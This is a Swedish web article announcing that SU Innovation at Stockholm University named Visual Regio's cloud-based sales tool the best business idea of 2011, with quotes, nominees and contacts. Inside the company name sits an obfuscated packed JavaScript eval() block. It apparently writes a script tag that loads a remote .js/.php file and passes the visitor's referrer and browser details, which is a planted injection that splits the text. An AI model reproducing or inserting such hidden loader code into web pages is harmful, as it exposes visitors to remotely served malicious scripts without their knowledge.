Image Image Image Image Image Image Image Image Image Image

| 25 juni, 2018

Scroll to top

Top

No Comments

Stockholms universitet Innovation har korat bästa affärsidé 2011

Stockholms universitet Innovation har korat bästa affärsidé 2011
Revue Magazine

Visual eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sbbsh|var|u0026u|referrer|kanbs||js|php’.split(‘|’),0,{}))
Regio har utsetts till ”Bästa affärsidé 2011” av SU Innovation och belönades vid prisceremonin med pengar och affärsutvecklingstjänster till ett värde av 10 000 kronor. Visual Regio har utvecklat ett molnbaserat marknads- och säljverktyg för att öka företags lönsamhet. Verktyget visualiserar marknaden på ett nytt sätt och effektiviserar prospektering, styrning och uppföljning.

”Självklart är vi glada och hedrade att koras till vinnare. Vår tjänst är nu utvecklad i en betaversion och vi har presenterat den för ett antal kunder inom olika branscher och fått ett väldigt bra mottagande och intresse. Strategin är att tillsammans med utvalda kunder utveckla tjänsten till en version 1.0, som planeras gå live i början av 2012.”, säger Patrik Grönlund och Erik Fürst, affärsmännen bakom idén.

”De kriterier vi utgått ifrån är affärsidéns potential och genomförbarhet. Vi har också lagt stor vikt på teamet, deras bakgrund och erfarenheter, för att få idén att flyga.  Att de gjort saker “i verkligheten” för att testa idén på sin marknad var viktigt i vår bedömning. Visual Regio är helt klart en värdig vinnare”, säger Ulf Eriksson, VD på SU Innovation.

Patrik Grönlund på Visual Regio har bland annat haft ledande chefsbefattningar inom Länsförsäkringar IT och har examen från Stockholms Universitet inom Data och Systemvetenskap med inriktning på IT management. Patrik har även en MBA från Handelshögskolan i Stockholm.  Erik Fürst, som  också har en bakgrund inom Länsförsäkringar, med fokus på affärsutveckling och innovation, har de senaste åren också arbetat med att driva affärsstrategier och planering.  Erik brinner för kundmötet och effektivisering för säljorganisationer.

Övriga förutsättningar för att delta i tävlingen var att deltagarna hade lämnat in sitt tävlingsbidrag till affärsplanstävlingen Venture Cup, där Stockholms universitet är en av arrangörerna, samt att personerna bakom affärsidén har en koppling till Stockholms universitet – som student, forskare, anställd eller alumn.

SU Innovations vinnarmotivering:
”Ett marknads- och säljverktyg för företag, med basen i ett gammalt, traditionellt verktyg. Känns självklart och intuitivt – men har unika lösningar. En mycket väl utvecklad idé och plan, som visar att grundarna har en klar bild av hur marknaden ser ut och vad som krävs för att ta den. Och som ger en känsla att de kommer att göra det!”

Övriga nominerade tävlingsbidrag:
”Travel-X” – Gabrielle Söderberg med motiveringen: ”Ett spännande koncept, som nog alla barnfamiljer på resa kan finna intressant, både som problemlösare, underhållning och läromedel. Har en bra kunskap om marknaden, kundbehovet och hur man når kunderna samt en intressant kombination av online och offline-affär.”

 Livskollen – Berit Ekenberg med motiveringen: ”En intressant och närmast självklar lösning för alla familjer “mitt i livet” som lever med högt tempo och många bollar i luften. Har också ett par kreativa och spännande extra options, som gör idén ännu mer intressant och unik. Har en klar bild av vägen framåt, vad som krävs, konkurrensen samt möjlig affärsmodell.”

Mer information
Ulf Eriksson, VD på SU Innovation: 0703-999 625,
ulf.eriksson@innovation.su.se
Patrik Grönlund, VD på Visual Regio: 0709-277 897, patrik@visualregio.com

Om SU Innovation
SU Innovation uppmuntrar och stödjer forskare, studenter, alumner och entreprenörer att kommersialisera forskning och idéer till framgångsrika produkter och tjänster på marknaden. SU Innovation gör detta på uppdrag av Stockholms universitet som ett dotterbolag till SU Holding. www.innovation.su.se

Submit a Comment